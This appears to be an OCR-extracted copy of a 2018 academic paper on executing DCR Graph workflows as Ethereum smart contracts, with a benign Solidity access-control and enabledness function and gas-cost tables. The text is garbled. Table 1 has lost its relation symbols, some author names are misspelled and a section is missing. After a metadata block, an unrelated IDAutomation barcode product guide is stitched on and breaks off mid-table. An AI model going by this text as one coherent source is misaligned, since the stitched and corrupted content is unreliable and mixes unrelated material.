Collaboration among Adversaries Madsen, Mads Frederik; Gaub, Mikkel; Høgnason, Tróndur; Kirkbro, Malthe Ettrup; Slaats, Tijs; Debois, Søren Publication date: 2018 Document Version Publisher's PDF, also known as Version of record Citation for published version (APA): Collaboration among Adversaries: Distributed Workflow Execution on a Blockchain Mads Frederik Madsen IT University of Copenhagen Rued Langgaards Vej 7 2300 Copenhagen S, Denmark mfrm@itu.dk Mikkel Gaub IT University of Copenhagen Rued Langgaards Vej 7 2300 Copenhagen S, Denmark mikg@itu.dk Tróndur Hógnason IT University of Copenhagen Rued Langgaards Vej 7 2300 Copenhagen S, Denmark thgn@itu.dk Måthe Eetrup Kirkbro IT University of Copenhagen Rued Langgaards Vej 7 2300 Copenhagen S, Denmark maek@itu.dk Tijs Slaats University of Copenhagen Emil Holms Kanal 6 2300 Copenhagen S, Denmark slaats@di.ku.dk Søren Debois IT University of Copenhagen Rued Langgaards Vej 7 2300 Copenhagen S, Denmark debois@itu.dk ABSTRACT We study distributed declarative workflow execution in an adversarial setting. In this setting, parties to an agreed-upon workflow do not trust each other to follow that workflow, or suspect the other party might misrepresent proceedings at a later time. We demonstrate how distributed declarative workflow execution can be implemented as smart contracts, guaranteeing (I) enforcement of workflow semantics, and (II) an incontrovertible record of workflow execution history. Crucially, we achieve both properties without relying on a trusted third party. The implementation is based on the Ethereum blockchain, inheriting the security properties (I) and (II) from the guarantees given by that chain. A recurring challenge for both the implementation and the analysis is the cost of operations on Ethereum: This cost must be minimised for honest parties, and an adversary must be prevented from inflicting extra cost on others. 1. INTRODUCTION Mutually distrusting organisations must often collaborate, as illustrated by the following example. On the Danish labour market employer-employee disputes are resolved not by the parties themselves, but by the umbrella organisations for respectively Danish employers (abbreviated here “DE”) and Danish unions (abbreviated here “DU”). A dispute may be resolved through negotiations between the two parties, or if negotiations break down, in court. Given their conflicting interests, DU and DE are mutually distrusting collaborators. They follow an agreed-upon process when negotiating a dispute, a process which defines simple things like who proposes meeting dates, who submits which document to whom and how, etc. However, depending on the strength of their respective cases, they may not have equal incentives to follow this process. If an employee has a strong claim to unpaid salary, DE may be less forthcoming in responding to meeting date proposals. Conversely, if an employer is planning legal but unpleasant mass firings, DU may similarly stall the process. Should a case go to court, either party’s intransigence may have legal repercussions. This reluctant collaboration is an example of a cross-organisational workflow between adversaries. System support for such a workflow must provide two key guarantees: (I) **Workflow correctness.** The system must enforce the agreed-upon workflow, so that no party can obtain an advantage by acting out of turn or failing to fulfil an obligation to act. (II) **Consensus on history.** The system must provide an incontrovertible record of execution, e.g., to decide in court which party did in fact violate the agreed-upon workflow. The usual way to achieve (I) and (II) is having participants agree on a trusted third party. This third party verifies that the actions taken are within the bounds of the agreement, and meticulously records the proceeding of the case. However, such a third party is not always practical: It may be difficult for the parties to agree on one, and it may be expensive to retain one, especially at large case volumes. In this paper, we show how (I) and (II) may be achieved without a trusted third party by implementing an executable workflow specification as an Ethereum smart contract. Our solution is based on recent advances in executable workflow specifications on the one hand and blockchain technologies on the other. A blockchain can be used as a mechanism to produce a trusted, immutable record of workflow execution. E.g., if DU and DE were to store the history of their common processes on a blockchain, they could both trust this history to be correct with very high probability. **Executable workflow specifications.** Agreeing on a record of workflow history is only a part of the puzzle. We must also enforce adherence to the agreed-upon workflow, i.e., the rules governing the exact order in which work can be done. Instead of encoding a workflow directly as a part of the source code of the system, it is typically modelled separately in a *workflow notation* such as BPMN [32], Workflow Nets [1], DECLARE [39], DCR graphs [7, 10], GSM [24], or CMMN [31]. In the best case, such a model is executed by an execution engine embedded in the overall system, enabling straightforward adaptation of work practices by changing the model rather than redeveloping the system itself. Traditionally, workflow notations have been flow-based, describing processes in a style similar to transition systems, representing precisely the steps that one may go through to satisfy the goals of the process. Such notations work well for strict production processes with little variation, but when applying them to knowledge intensive processes [11], which usually allow a large degree of flexibility and many different paths towards the goals of the process, the models tend to become overly complex and unreadable [39]. Declarative process notations [39, 19, 31, 38] address this deficiency by capturing not explicit flow but rather the constraints and goals of a process, letting the system deduce the allowed paths to the goal. As shown in [20], the declarative approach is highly relevant in the case of DU and DE, whose processes are strongly knowledge intensive. A declarative process model may be implemented as a *smart contract* [36, 40]: a blockchain where blocks represent not only a common history, but also contracts in the form of executable code. For example, DU and DE have agreed that DU will always propose meetings first; encoding this rule in a smart contract, we can ensure that any attempts to add new events in violation of this rule are rejected. **Contributions.** We show that a declarative workflow engine can be employed in an adversarial setting by embedding it on a blockchain as smart contracts. We demonstrate how this approach can be implemented in practice on the Ethereum Virtual Machine (EVM), in which each operation has an associated cost denoted in *Gas*. Once the sum of Gas has been calculated for an execution, it is paid for in the Ethereum cryptocurrency Ether by the user calling the code, at an Ether/Gas rate specified by that user. This rate allows miners to prioritise those calls paying the most. The EVM is in principle Turing-complete [42]. However, all computations are in practice finite, limited by the amount of Gas that a caller is willing to spend. Ethereum allows one to verify the existence of specific source code on the blockchain, whether it has been run, and whether a run was completed successfully or not. Moreover, Ethereum certifies that code was executed as specified, and that only authorised parties execute contract calls [42, 40]. This means that when implementing workflows as smart contracts, any participant can be certain that the source code is unchanged and that every execution is validated with respect to both the contract logic and execution rights. Like the Bitcoin blockchain, the Ethereum blockchain relies on mining being hard to ensure that the probability of an attacker overtaking the main chain, rewriting history, is low. However, whereas the Bitcoin blockchain and variants has seen work on analysing under what circumstances and with what probabilities that might happen [3, 27, 35, 26, 6, 2, 37, 18] we are unaware of similar analyses for Ethereum. 3. DCR GRAPHS In this Section, we recall DCR Graphs, a vehicle for specifying admissible sequences of event executions. A DCR Graph specifies an "agreed-upon" workflow, where the events are the activities of the workflow. A DCR Graph comprises events (nodes) and relations between events (edges); events have state which is recorded in a marking. Relations indicate how executability of one event may depend on the states of others, and how execution changes such states. **Definition 1** (DCR Graph [19]). A DCR Graph is a tuple \((E, R, M)\) where - \(E\) is a finite set of events, the nodes of the graph. - \(R\) is the edges of the graph. Edges are partitioned into five kinds: conditions \((\rightarrow\odot)\), responses \((\bullet\rightarrow)\), milestones \((\rightarrow\infty)\), inclusions \((\rightarrow+)\), and exclusions \((\rightarrow\%)\). - \(M\) is the marking of the graph, a triple \((Ex, Re, In)\) of sets of events, respectively the previously executed \((Ex)\), the currently pending \((Re)\), and the currently included \((In)\) events. When \(G\) is a DCR Graph, we write, e.g., \(E(G)\) for the set of events of \(G\), as well as, e.g., \(Ex(G)\) for the executed events in the marking of \(G\). We give in Figure 1 an excerpt of the workflow of DU and DE reported in [20]. The events are nodes in the graph; the marking of each event is shown graphically: *Hold Meeting* is pending, viz. the blue exclamation mark; both *Accept* events are excluded viz. the dashed border. ![Figure 1: The DU/DE example—a DCR model of a cross-organisational workflow](image) By default, every activity may execute any number of times. We regulate the sequencing of such activity executions by adding relations between activities. There are five such relations: Three which mutate the state of some events when another executes, and two which constrain the ability of one event to execute depending on the state of others. 3.1 Execution of Events To specify what happens when an event executes, we have the response, inclusion, and exclusion relations. First, the response. When either DE or DU proposes a date, the other is required to eventually accept one. The blue responses \((\bullet\rightarrow)\) from Propose - DU to Accept - DE and Propose - DE to Accept - DU model this requirement: Executing the first event makes the second event pending. The red exclusions \((\rightarrow\%)\) temporarily remove events from the process. This can be both an event removing itself after being executed, as is the case for each instance of Accept, or an event removing another event, exemplified by Accept - DU removing Accept - DE and vice versa. We say that such a removed event is excluded, indicated by a dashed border, as seen in the two Accept events. Exclusions are dynamic and may be reverted: When DU or DE proposes new dates, the other is expected to accept these dates again. This is modelled through the green inclusions \((\rightarrow+)\) from Propose - DU to Accept - DE and Propose - DE to Accept - DU. Because Accept - DU and Accept - DE are excluded (dashed border), either requires its including event to happen before it can itself happen. We formalise the notion of executing an event. **Definition 2** (Execution [19]). Let \(G = (E, R, M)\) be a DCR Graph with marking \(M = (Ex, Re, In)\). If we execute \(e \in G\), we obtain the resulting DCR graph \((E, R, M')\) with \(M' = (Ex', Re', In')\) defined as follows. 1. \(Ex' = Ex \cup e\) 2. \(Re' = (Re \setminus e) \cup (e \bullet\rightarrow)\) 3. \(In' = (In \setminus (e \rightarrow\%)) \cup (e \rightarrow+)\) That is, to execute an event \(e\) one must: (1) add \(e\) to the set \(Ex\) of executed events; (2) update the currently required responses \(Re\) by first removing \(e\), then adding any responses required by \(e\); and (3) update the currently included events by first removing all those excluded by \(e\), then adding all those included by \(e\). 3.2 Enabled Events Not all events in a graph are necessarily allowed to execute. To specify which events are in fact executable we have conditions and milestones. A condition indicates that when the source is included but not executed, the target cannot execute. For example, by convention, DU is always the first to propose dates. This is modelled by the condition relation \((\rightarrow\bullet)\) between Propose - DU and Propose - DE. When dates have been proposed but not yet accepted, the meeting cannot be held. The milestone relations \((\rightarrow\infty)\) from Accept - DU and Accept - DE to *Hold Meeting* ensure this: a milestone indicates that whenever the source is included and pending, the target cannot execute. In the diagram, the Accept events are not yet pending; this is intentional: DU and DE may skip proposing dates and hold ad hoc meetings. Unlike the condition relation, an event constrained by a milestone can become blocked again. In our example, if a date was accepted but later new dates are proposed, accepting dates becomes pending again, blocking *Hold Meeting*. We give formal meaning to these relations. **Definition 3** (Enabled Events [19]). Suppose \(G = (E, R, M)\) is a DCR Graph with marking \(M = (Ex, Re, In)\). We say that an event \(e \in E\) is enabled and write \(e \in enabled(G)\) iff (a) \(e \in In\), (b) \(In \cap (\rightarrow\bullet e) \subseteq Ex\), and (c) \(In \cap (\rightarrow\infty e) \subseteq E \setminus Re\). That is, enabled events (a) are included, (b) have their included conditions already executed, and (c) have no included pending milestones. The enabled events for the DCR Graph in Figure 1 are Propose - DU and Hold Meeting. General DCR Graphs have labelled events, allowing distinct events to exhibit the same observable activity, a detail we have elided in the current paper. In the general case, DCR Graphs express the union of regular and \( \omega \)-regular languages [10]. ### 3.3 Distributed DCR Graphs Distributed implementations of DCR Graphs were studied in [22] and [9]. In both cases, the core idea is that workflows are partitioned in subsets of events, with each participant owning a particular subset. The owner of an event is responsible for maintaining the marking (\( M \), Definition 1) of that event. Moreover, only the owner of an event can execute it (Definition 2). Since executing one event may modify others via exclusion, inclusion and response arrows (Definition 2), whenever a party executes an event, it may have to notify owners of affected events. E.g., in the DU/DE example (Figure 1), events are naturally owned by either DU or DE as indicated at the top of each event. The event Propose - DU is owned by DU and so can only be executed by DU; however, executing this event includes the event Accept - DE, and so DU must notify DE whenever it executes Propose - DU, in order that DE may toggle the state of Accept - DE to included. Similarly, before executing an event, the owner must verify that the event is enabled (see Definition 3). Whether an event is enabled is a function of the marking of other events via condition or milestone relations, hence the owner may have to query owners of such other events. E.g., in the DU/DE example, DE cannot execute Propose - DU before querying DU about the state of Propose - DU because of the condition relation from the latter to the former. As queries for enabledness may interleave with effects of an execution, distributed implementations of DCR Graphs generally need some form of concurrency control [9]. ### 4. DISTRIBUTED DCR GRAPHS AS ETHEREUM SMART CONTRACTS In this section, we consider in the abstract an implementation of distributed DCR Graphs as Ethereum smart contracts. We shall see how such an implementation achieves the goals (I) and (II) of Section 1 provided an adversary has no feasible attack on the Ethereum blockchain. The naive implementation of DCR Graphs as Ethereum smart contracts is to simply implement a contract comprising a DCR Graph (Definition 1) represented as an Ethereum data structure, and calls for computing execution and enabled events (Definitions 2 and 3). Only the owner of an event has access rights to execute that event. This appealingly simple idea turns out to mask considerable pitfalls, in particular regarding who bears the cost of executing that call. In this section, we analyse this situation. ### 4.1 Cost of Relations Previous treatments of distributed DCR graphs [9, 22] do not emphasise ownership of relations. Adding a relation to a DCR Graph induces additional computation in either enabledness (condition, milestone) or effect of execution (inclusion, exclusion, response). On Ethereum, additional computation translates directly to additional cost, so an adversary can inflict cost on honest parties if he can add new relations. For example, adding 100 distinct conditions \( A_i \rightarrow X \) to some event \( X \) would increase the cost of computing enabledness of \( X \) by 100 additional checks whether each \( A_i \) is executed or excluded. ![Figure 2: Inter-workflow relations](image) For conditions and milestones, each such relation induces computational cost at the owner of the target event. For example, in Figure 2, Workflow 2 must consult Workflow 1 to learn the state of \( A \) before it can execute event \( C \). In general, adding an incoming relation such as \( A \rightarrow C \) increases the cost of computing enabledness of its target \( C \). To avoid cost-inflicting attacks, only the owner of the target \( C \) should be allowed to add incoming relations to it. However, because executing \( D \) requires an update of the state of \( B \), if that update is to be performed by the owner of \( B \), there is again an opportunity for an adversary to inflict cost. In that case, we must again require that only the owner of \( B \) and \( D \) jointly may add relations. We summarise where adding relations incurs cost Table 1. <table> <thead> <tr> <th>Added relation</th> <th>cost on A</th> <th>cost on B</th> </tr> </thead> <tbody> <tr> <td>( A \rightarrow B )</td> <td>✓</td> <td></td> </tr> <tr> <td>( A \rightarrow B )</td> <td>✓</td> <td>✓</td> </tr> <tr> <td>( A \rightarrow% B )</td> <td>✓</td> <td>✓</td> </tr> <tr> <td>( A \rightarrow B )</td> <td>✓</td> <td>✓</td> </tr> </tbody> </table> Table 1: Incurred cost of added relations ### 4.2 Correctness In general, adding relations to a workflow can make that workflow both more and less restrictive [8, 10]. For example, in Figure 2, the condition relation (top) means that Workflow 2 must wait for Workflow 1 to execute \( A \) before it can execute activity \( C \). If we imagine we have just added that condition, the new combined workflow has less behaviour than the old one, but no new behaviour. Thus, an adversary who can add relations can mount a potential denial-of-service attack by adding enough relations that the resulting combined workflow has no behaviour left. Conversely, adding inclusions and exclusions can make a workflow less restrictive [8]. Without the inclusion relation... (bottom) in Figure 2. Workflow 1 can never execute activity $B$. If we imagine we have just added that inclusion, the new combined workflow has more behaviour than the original one, since the new one admits the sequence $DB$ which the old one did not. This means that an adversary who can add relations can violate correctness of the original workflow. E.g. if the activity $B$ were “pay out lump sum”, the adversary has successfully orchestrated a payout in violation of the original workflow policy. Assume a correct implementation of (1) the computation of enabled events and (2) the effect of executing event in Solidity. Assume moreover that this implementation is used for implementing the distributed workflow in such a way that each party to the workflow can execute only the events they own, and only when these events are enabled. In this case, running this implementation on Ethereum, we get an implementation of the workflow which automatically achieves the goals of workflow correctness (I) and consensus on history (II) provided the adversary cannot produce valid blocks fast enough to outpace the Ethereum miner network. Note that in workflows with more than two participants, we do not preclude colluding actors within the bounds of concurrent workflow semantics. In such a workflow, two or more participants could mount a denial-of-service attack against other participants by coordinating executions of activities on the same block, thereby skipping states in which specific activities were enabled. This is an inherent consequence of allowing concurrent executions of activities in DCR-graphs, and not a violation workflow correctness (I). 5. COST REDUCTIONS Our practical experiments have revealed two major insights about executing DCR Graphs on Ethereum: 1. It is indeed feasible to implement distributed workflows in an adversarial setting on the Ethereum blockchain. 2. However, to keep costs manageable, our implementation must take some counter-intuitive design decisions, including implementing only one contract and implementing set operations as bitvectors. DCR Graphs as presented in Section 3 are simple enough that the core data structures (relations and markings, Definition 1) as well as operations on them (execution and enabledness, Definitions 2 and 3) are straightforward to implement in contemporary programming languages. A naive implementation implements DCR Graphs straightforwardly as an Ethereum contract for each workflow instance, representing marking and relations straightforwardly using standard data structures. This naive implementation has two shortcomings: 1. The Gas costs of Ethereum are dominated by the price of creating a smart contract, which is an order of magnitude more expensive than other operations [42]. 2. The cost of computing enabledness respectively execution grows linearly with the number of incoming respectively outgoing relations. 5.1 RELATIONS To reduce the impact of additional relations on the cost of computing enabledness and execution, we exploit that the core EVM datatype is a 256-bit value, noting that the core operations of DCR Graphs (Definitions 3 and 2) are all simple set-manipulations and can be implemented efficiently as bit vectors. Our prototype for this reason assumes at most 256 events in a DCR Graph, an assumption that is both practically reasonable [29, 34], and straightforward to remove if necessary. For such fixed-size bit vectors, we get an upper bound of the cost of executing an activity: execution is implemented as a static check of the legality of the execution, followed by 3 bitwise-operations between bit vectors representing relations. We give the implementation of the enabledness computation in Listing 1; we encourage the reader to compare that listing, in particular lines 16, 20–21, and 25–27 to the clauses (a)-(c) in Definition 3. ```solidity function canExecute(uint256 wfId, uint256 activity) public constant returns (bool) { var workflow = workflows[wfId]; uint32 i; // sender address must have execute rights for (i = 0; i < workflow.authAccounts.length; i++) if (workflow.authAccounts[i] == msg.sender) break; // sender authorised if (i == workflow.authAccounts.length) return false; // sender not authorised // activity must be included --- Def. 3(a) if ((workflow.included & (1<<activity)) == 0) return false; // all included conditions executed --- Def. 3(b) if (workflow.conditionsFrom[activity] & (~workflow.executed & workflow.included) != 0) return false; // no included milestones pending --- Def. 3(c) if (workflow.milestonesFrom[activity] & (workflow.pending & workflow.included) != 0) return false; return true; } ``` Listing 1: Enabled computation Besides the optimisations we have mentioned so far, our prototype implementation uses additional tricks to minimise Gas costs, notably packaging call data to conserve storage space. We refer the interested reader to [17], which contains additional implementation detail. As mentioned in Section 2, execution of Ethereum smart contracts is paid for by setting an exchange rate between Gas, the cost of execution instructions, and the cryptocurrency Ether. We compare the cost of the naive and optimised implementations in Table 2. Note that the cost of executing some activities actually increases from naive the to the optimised implementation: the bit vector implementation give lower Gas cost on execution only when events have many relations. The DU/DE example is too small to exhibit this effect; however, practical workflows tend to have many more relations [21]. 5.2 Contract Creation & Access Control The cost of creating an instance of the DU/DE example workflow is given in Table 2, column “Naive”. Notice that creating the contract, “initialisation” is two orders of magnitude more expensive than subsequent event executions. To reduce this cost, we propose a mono-contract implementation, that is, a single contract which hosts all workflows, and new workflows can be added at any point after contract creation. In this mono-contract implementation methods each take an index of the workflow to work on. In such a setting, the cost overhead for creating a contract is incurred only once\(^2\): As subsequent workflows are hosted by this single contract, the cost of creating a contract does not reoccur. The cost of constructing a new workflow is reduced substantially, see the column “optimised” in Table 2. The mono-contract provides access control by accepting, on workflow creation, a list of public keys/addresses that are authorised to subsequently execute events; the implementation manually checks that the caller is authorised before executing an event. Because state in Ethereum can only be changed through contract calls, this mechanism provides complete mediation: there is no way to alter the state of running workflows without going through the contract operations. Returning to the code for the enabledness computation in Listing 1, we see access control computed in line 7–10, using the Ethereum provided \texttt{msg.sender} constant. As mentioned, workflow creation is an order of magnitude cheaper in the optimised implementation. Moreover, in the naive implementation, workflow creation is two orders of magnitudes more expensive than event executions; in the optimised implementation only one. ### Table 2: Cost comparison, naive and optimised implementation. <table> <thead> <tr> <th>Event</th> <th>Naive GAS</th> <th>Naive USD*</th> <th>Optimised GAS</th> <th>Optimised USD*</th> </tr> </thead> <tbody> <tr> <td>1. Initialisation(^*)</td> <td>2,185,061</td> <td>14.582</td> <td>717,709</td> <td>4.790</td> </tr> <tr> <td>2. Propose - DU</td> <td>61,126</td> <td>0.408</td> <td>66,293</td> <td>0.442</td> </tr> <tr> <td>3. Propose - DE</td> <td>62,592</td> <td>0.418</td> <td>52,615</td> <td>0.351</td> </tr> <tr> <td>4. Accept - DU</td> <td>46,126</td> <td>0.308</td> <td>51,293</td> <td>0.342</td> </tr> <tr> <td>5. Accept - DE</td> <td>46,226</td> <td>0.308</td> <td>52,615</td> <td>0.351</td> </tr> <tr> <td>6. Hold Meeting</td> <td>37,353</td> <td>0.249</td> <td>49,665</td> <td>0.331</td> </tr> <tr> <td><strong>Sum</strong></td> <td>2,392,258</td> <td>16.273</td> <td>990,190</td> <td>6.608</td> </tr> </tbody> </table> \(^*\) Prices in USD are computed from average Gas- and Ether prices at the time of writing [13, 14]. \(^\star\) Prices for the naive implementation includes contract creation and workflow creation; prices for the optimised implementation only workflow creation. 6. IMPLEMENTATION We have implemented a software tool which converts a DCR Graph to a Solidity smart contract. To show that our DCR engine can be used in practice, we have implemented a graphical user interface (GUI), where users can create workflows and execute activities on a deployed Ethereum contract. We host the source code of the contracts at https://github.com/DCREum/dcreum.github.io for perusal, and the GUI for anyone to use at https://dcreum.github.io. An Ethereum node and client are required to view and use the GUI. We recommend Parity alongside the Google Chrome extension Parity Ethereum Integration. Multiple high-level languages compiling to EVM bytecode exist; our implementation was done in the statically typed object-oriented language Solidity. However, compared to mainstream programming languages, in EVM/Solidity we have to contend additionally with quirks of the Solidity interpreter. For example, Solidity limits the number of variables allowed in scope at one time, as these are always kept on the stack, and the EVM only allows access to the 16 top-most items [42]. Other limitations include externally available functions not being allowed structs or nested arrays as arguments or return type. Ethereum execution causes a delay in event execution, as the network has to process and accept such an execution. We can have the acceptance of a transaction (event execution) prioritised by offering above-market Gas prices. Unless we send the request at almost exactly the same time of new block propagation, in experiments run late spring 2017, our requests have been included in the next mined block when paying market Gas prices. However, even though a block is accepted, it may still find itself on a less difficult chain, and thus eventually discarded. In general, like in Bitcoin and other blockchain-based transactional systems, one must wait some number of blocks before one can reasonably assume that the transaction is permanently included. The frequency of event executions is bounded by the (dynamic) Gas limit [42]. This limit is currently at 6,718,941, which for the DU/DE example (Figure 1) in theory would allow between 101 and 135 executions, depending on the exact activity executed. If we consider instead single-participant, non-concurrent executions, the limit is the mining time, which should average 12 seconds, although at the time of writing, the average for the last 5000 blocks is ca. 30 seconds. In general, it has been our experience that mining time varies between a few seconds and several minutes. We estimate we have seen an average of 1-2 executions per minute at market Gas prices. 7. CONCLUSION We have demonstrated how to implement distributed declarative workflow execution in an adversarial setting, without the assistance of a trusted third party, by implementing DCR Graph declarative process models as Solidity contracts running on the Ethereum blockchain. Within the the security guarantees given by this blockchain, this implementation guarantees that the execution does follow the agreed-upon workflow—the DCR Graph—(I) and that the sequence of executions recorded on the blockchain is incontrovertibly the actual recorded history (II). Cost is an issue, both because an adversary must be prevented from inflicting cost on an honest party, and because cost of contract execution is high enough that we must optimise. Particularly helpful optimisations are the mono-contract and bitvector representation of sets and relations. We have demonstrated the economic feasibility of the implementation: see actual costs in Table 2. Moreover, we have discussed bounds on delay and frequency of event executions in Section 6, estimating that the Ethereum blockchain can likely sustain 1-2 execution per minute at market prices. \(^2\)This contract was created in the transaction [12] at a cost of 2,976,162 Gas/USD 8.73. 8. REFERENCES [12] Mono-contract creation transaction. https://etherscan.io/tx/0x003fb07eb74b4a2557dc48fa8e7799e481098e0c4ed0857ce646dbe3b9b90cda.
{"Source-Url": "https://static-curis.ku.dk/portal/files/194806456/fab18_submission_06.pdf", "len_cl100k_base": 7271, "olmocr-version": "0.1.53", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 29284, "total-output-tokens": 10439, "length": "2e12", "weborganizer": {"__label__adult": 0.0004854202270507813, "__label__art_design": 0.0004837512969970703, "__label__crime_law": 0.0011415481567382812, "__label__education_jobs": 0.0009675025939941406, "__label__entertainment": 0.0001417398452758789, "__label__fashion_beauty": 0.0002301931381225586, "__label__finance_business": 0.00260162353515625, "__label__food_dining": 0.0004589557647705078, "__label__games": 0.0009641647338867188, "__label__hardware": 0.0015039443969726562, "__label__health": 0.0008478164672851562, "__label__history": 0.00046896934509277344, "__label__home_hobbies": 0.0001823902130126953, "__label__industrial": 0.0010042190551757812, "__label__literature": 0.0004265308380126953, "__label__politics": 0.0007143020629882812, "__label__religion": 0.0005350112915039062, "__label__science_tech": 0.3349609375, "__label__social_life": 0.00016677379608154297, "__label__software": 0.0195770263671875, "__label__software_dev": 0.630859375, "__label__sports_fitness": 0.00029850006103515625, "__label__transportation": 0.000736236572265625, "__label__travel": 0.00024819374084472656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 38999, 0.03961]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 38999, 0.23323]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 38999, 0.88996]], "google_gemma-3-12b-it_contains_pii": [[0, 548, false], [548, 4784, null], [4784, 8557, null], [8557, 13996, null], [13996, 19563, null], [19563, 25244, null], [25244, 31997, null], [31997, 37574, null], [37574, 38999, null]], "google_gemma-3-12b-it_is_public_document": [[0, 548, true], [548, 4784, null], [4784, 8557, null], [8557, 13996, null], [13996, 19563, null], [19563, 25244, null], [25244, 31997, null], [31997, 37574, null], [37574, 38999, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 38999, null]], "pdf_page_numbers": [[0, 548, 1], [548, 4784, 2], [4784, 8557, 3], [8557, 13996, 4], [13996, 19563, 5], [19563, 25244, 6], [25244, 31997, 7], [31997, 37574, 8], [37574, 38999, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 38999, 0.06466]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
f51c62bed9619d0cdfb904752f78ceff7c3125f4
IDAutomation.com, Inc. IDAutomation.com, Inc. and Benjamin Johnson, Technical Support & Development BARCODE EDUCATIONAL GUIDE The Barcode Educational Guide provides an introduction to IDAutomation Barcode Products, barcode symbologies, and symbology standards. What products do we offer? - IDAutomation provides automation components to generate barcodes including: Barcode Applications (stand-alone applications: Image Generator and Label Software Application) Fonts (Barcode, MICR, OCR, and Security Fonts similar to Times New Roman, Arial, and Courier New) Barcode Components (ActiveX Controls, and other Development Components –Java, .NET DLLs) Please view the Barcoding for Beginners video: [http://www.youtube.com/watch?v=CJW5D5SDAgw](http://www.youtube.com/watch?v=CJW5D5SDAgw) - IDAutomation provides hardware including: Barcode Scanners and Printers. We are a reseller of most scanners and printers. However, our in-house hardware includes: SC5USBD (USB Wired Scanner compatible with Windows, Linux, UNIX, Mac) SC5USBW (Wireless Scanner with USB Cradle connection compatible with Windows, Linux, UNIX, Mac) SC7USB 2D (USB Wired 2D Scanner) The above scanners are privately labeled to us by Argox, the one below is from Cipher: SC1500 (USB Wired Scanner compatible with Windows, Linux, UNIX, Mac) Some of the vendors that we work with include: Datamax, Honeywell, Symbol Technologies, Metrologic, Zebra, and Intermec. [The full list of vendors](#). - As a reseller, IDAutomation provides Inventory Tracking and Point of Sales solutions including: Red Beam Inventory Tracking Software How do barcodes work? A **barcode is designed to eliminate manual entry and error.** Imagine an employee working in a data entry facility that manually enters (keyboard entry) customer ID numbers from an ID card into a database search to pull up customer information. Manually entering hundreds of ID numbers could take a tremendous amount of time and may even cause entry errors. In this situation, a barcode can be used. The user can generate barcodes of all customer ID numbers and print the information on the ID card, then use a scanner to scan the barcode and quickly process the information as if it were being typed into the database search. To generate the barcode, use a barcode font, component, or application. To scan the barcode, use a hand held or software barcode scanner. Once the barcode is created, connect the scanner to the computer or device, open an application (text editor or browser) and scan the barcode. The data will appear where the cursor resides. The process is very similar to using a keyboard to manually enter information into a text area. A question asked by many users that create and scan barcodes is, “How does the scanner know when to begin and end a barcode scan?” There are special characters designated as start/stop characters that appear at the beginning and end of a barcode. It informs the barcode scanner when to begin and end a scan. In the case of the database entry search, the scanner simply places the data into a particular field that is used for a search. The application handles the data it receives. Barcode Applications Barcode Applications are barcode products that may be used to generate barcode images (JPEG, BMP, GIF, etc). The applications are stand-alone products that are more user-friendly than Fonts and Components. IDAutomation sells two popular barcoding applications and is a reseller of another. The Barcode Label Software The Barcode Label Software is a barcode label printing software with a user-friendly label design interface. This product includes three versions: Free Version, Standard Version and Pro Version (which generates 2D barcodes and connects to advanced database systems). The software can generate barcode labels based on data directly entered into the software (as embedded data) or link data from other sources (external data), such as an Excel spreadsheet, CSV file, or database table. Predefined labels can be selected or custom labels can be created. Labels can be printed to thermal and laser printers. Compatible with Windows only. Further Reference: Product Page User Manual IDAutomation is also a reseller of Niceware’s NiceLabel Software. It is very similar to our Barcode Label Software but has a few more features, including RFID. It is supported by Niceware International. The Barcode Image Generator The IDAutomation Barcode Image Generator is a barcode image generation application that creates barcodes one at a time or many at a time using the user interface or command line. It supports JPEG, EPS, TIFF, PNG, BMP, WMF and 1 bit per pixel monochrome bitmap image formats. It is one of the easiest products to use. Barcode data, type, height, color, margins and width can be modified. Compatible with Windows and Mac. The software can import TEXT files to generate multiple barcodes. Supports several barcodes types: Linear and 2D barcodes. Further Reference: - Product Page - User Manual Barcode, OCR, MICR, and Security Fonts **Barcode fonts** are font files that create barcodes—this is the most popular method for creating barcodes. **OCR program fonts** are used for several purposes where automated systems need a standard character shape defined to properly read text without the use of barcodes. Some examples of OCR program font implementations include bank checks, passports, serial labels and postal mail. **Security fonts** are used to print secure text, names and currency amounts on highly secure documents, such as a bank check, in a manner that cannot be easily altered and may prevent forgery. **MICR E13B** and **MICR CMC7 fonts** are special font that is used on bank checks and drafts to print characters for magnetic recognition and optical character recognition systems. **About Barcode Fonts** Of the four font types available by IDAutomation, barcode fonts are the most complex. Unlike fonts such as Times New Roman, Arial, MICR, and Courier New, barcode fonts require an extra step to ensure that the created barcode is scannable. In order to create a scannable barcode, the data must pass through a calculation tool known as a font encoder (font tool). The font tool produces an output that includes start/stop characters, guard bars (for UPC and EAN), check digit, and encoded data. Start/Stop characters identify the beginning and end of a barcode. Check Digits ensure that the barcode is properly created. Encoded data is data in the form that only barcode fonts can understand. Imagine that you need to bake a cake for your cousin’s birthday party. You (Barcode Creator) Think of your data as the cake mix, the font tool as the cooking tools (spoon, bowl, and oven), and the barcode font as the icing for the cake. The Font Tool / Font Encoder The cake mix (data) must be mixed and baked (passed through the font tool) using the tools and oven. Once the cake has baked (encoded data), the last step is to apply the icing (barcode font). Here is another example: <table> <thead> <tr> <th>Data</th> <th>Data Encoded</th> <th>Data with Barcode Font Applied</th> </tr> </thead> 